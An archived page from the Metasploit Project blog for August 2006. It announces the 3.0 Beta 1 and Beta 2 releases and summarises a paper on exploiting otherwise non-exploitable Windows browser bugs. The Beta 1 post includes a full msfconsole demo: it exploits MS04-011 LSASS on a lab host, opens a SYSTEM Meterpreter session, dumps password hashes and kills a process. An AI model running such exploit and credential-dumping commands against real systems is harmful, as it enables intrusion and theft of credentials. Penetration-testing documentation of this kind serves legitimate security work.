Skip navigation
All Places > Metasploit > Blog > 2006 > August
2006

Originally Posted by hdm

 

 

We are happy to announce that the second beta release of the 3.0 tree is now ready for download. This release includes incremental improvements to the first beta as well as some new features and modules.  3.0 Beta 2 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.

 

This release marks the first time that the Subversion repository for the Metasploit Framework has been made public. Subversion provides the backend for the online update system for 3.0 and allow users of Beta 2 to synchronize with the live development tree. Prior to the final release, a stable branch will be added that will become the default update source for users of 3.0. As many folks are aware, Subversion doesn't have the best security track record, and no few hours were spent in locking down the metasploit.com repository and web service (hint: grsecurity/gradm does a great job if you can spend the time to tune per-application profiles).

 

The Auxiliary module system now includes the Scanner mixin. It is now possible to design a module that works on a single host, a range of hosts, or a specific number of hosts at a time. This allows for the development of  modules that perform vulnerbility scanning and mass-fingerprinting.  Auxiliary modules can now import almost any Exploit module mixin and take advantage of some of the fancy protocol-specific APIs (SMB, DCERPC, HTTP, etc). A few examples of Auxiliary modules in Beta 2 are listed below:

 


The concept of "generic" payloads has been added to the Framework. This allows you to specify a class of payloads (bind shell, reverse shell, etc) instead of a specific payload, allowing the framework to pick an appropriate one at runtime based on target-specific information. This is critical for multi-platform client-side exploits and assists with some of the exploit automation features still in development. Two generic payloads are currently supported ( generic/shell_bind_tcp and generic/shell_reverse_tcp ). A bug was found in the generic payload support after the Beta 2 release was cut, so make sure you 'svn update' (or MSFUpdate on Windows).

 

The Metasploit.com web site went through another design change this weekend, the new look makes navigation easier and will pave the way for the 3.0 module browser. The image in the top left corner is part of a larger piece we commissioned from BRUTE, whom many know from his work with KMFDM. The full image will be featured on tee shirts, posters, and tattoos over the coming year.

 

If you have any questions about the framework, this release, or the Metasploit Project in general, we (the developers) can be reached via email (msfdev[at]metasploit.com).

 

Enjoy!

 

-HD

Originally Posted by hdm

 

 

A few weeks ago, Nick Selby of the 451 Group interviewed me for a market research report about the Metasploit Project. This report was immediately available to 451 subscribers, but not to the general public. Today, TechTarget republished this report in the form of an article for their security news column. This report looks at the history of the project, our "competition", and the reasons behind the license change in version 3.0. I would like to thank Nick for giving us a fair review and  taking the time to check each and every fact mentioned in the report. More information about Metasploit's relationship with the Hacker Foundation will be made available in September.

Originally Posted by skape

 

 

During the month of July, H D posted one browser bug each day on the browser fun blog.  The majority of these bugs centered around issues that are typically regarded as non-exploitable, such as NULL pointer dereferences and stack overflows (not to be confused with stack-based buffer overflows).  Though this may be the case, there is an interesting exploitation vector that can be applied to browsers that run on Windows, such as Internet Explorer, that can potentially leverage code execution from otherwise non-exploitable issues.  The details about how this can be accomplished are described in a paper that Skywing and I have published entitled Exploiting the Otherwise Non-Exploitable on Windows

 

The basic idea behind this technique involves abusing a design flaw in the way the SetUnhandledExceptionFilter routine operates which results in an attacker being able to point the top-level unhandled exception filter to an invalid address.  Once this occurs, all that's necessary is to use a heap spraying technique to place code at the location that the top-level unhandled exception filter points to.  The final step is to trigger an unhandled exception, such as a NULL pointer dereference, that will result in the execution of arbitrary code.  Abusing the top-level unhandled exception filter has been done in the past, but this technique illustrates an indirect way to gain control that does not rely on the ability to perform a 4x4 overwrite.  Furthermore, it is not limited by improvements that have been made to protect the top-level unhandled exception filter, such as through the use of function pointer encoding.

 

The important take away is that the use of this technique means that all of the otherwise non-exploitable issues reported in H D's postings can potentially be exploited in a reliable fashion through the use of this technique.  However, it will only work on machines that are not patched with the latest critical updates since this issue has now been addressed by the patch that was created for MS06-051.  At any rate, it would be interesting to know what other applications might be vulnerable to this type of attack as well as other interesting ways to achieve it in Internet Explorer.

Originally Posted by hdm

 

 

We are happy to announce that the first beta release of the 3.0 tree is now ready for download. This release contains numerous bug fixes and improvements to the previous alpha release. 3.0 Beta 1 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.

 

If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.

 

Some quick highlights compared to version 2.6:
- All modules are organized in a directory heirarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)

 

This release can be obtained from the Metasploit web site.

Unix users may need to install the openssl and zlib ruby modules for the
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

 

User of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.

 

Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.

 

Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.

 

A quick demonstration of using msfconsole with meterpreter:

 

____________
< metasploit >
------------
       \   ,__,
        \  (oo)____
           (__)    )              ||--|| *

 


       =[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
       =[ 4 aux

 

msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444)
[*] The DCERPC service did not reply to our request

 

Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM

 

meterpreter > use priv
Loading extension priv...success.

 

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[snip]:::

 

meterpreter > cd c:meterpreter > ls

 

Listing: c:
============

 

Mode              Size       Type  Last modified                 Name
----              ----       ----  -------------                 ----
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0          dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0          dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195        fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416     fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]

 

meterpreter > ps

 

Process list
============

 

    PID Name Path
    --- ---- ----
    176   smss.exe           \SystemRoot\System32\smss.exe
    200   csrss.exe          \??\C:\WINNT\system32\csrss.exe
    224   winlogon.exe       \??\C:\WINNT\system32\winlogon.exe
    252   services.exe       C:\WINNT\system32\services.exe
    264   lsass.exe          C:\WINNT\system32\lsass.exe
    440   svchost.exe        C:\WINNT\system32\svchost.exe
[ snip ]
    1804  wins.exe           C:\WINNT\System32\wins.exe
    2676  logon.scr          C:\WINNT\system32\logon.scr

 

meterpreter > kill 2676
Killing: 2676

Filter Blog

By date: By tag: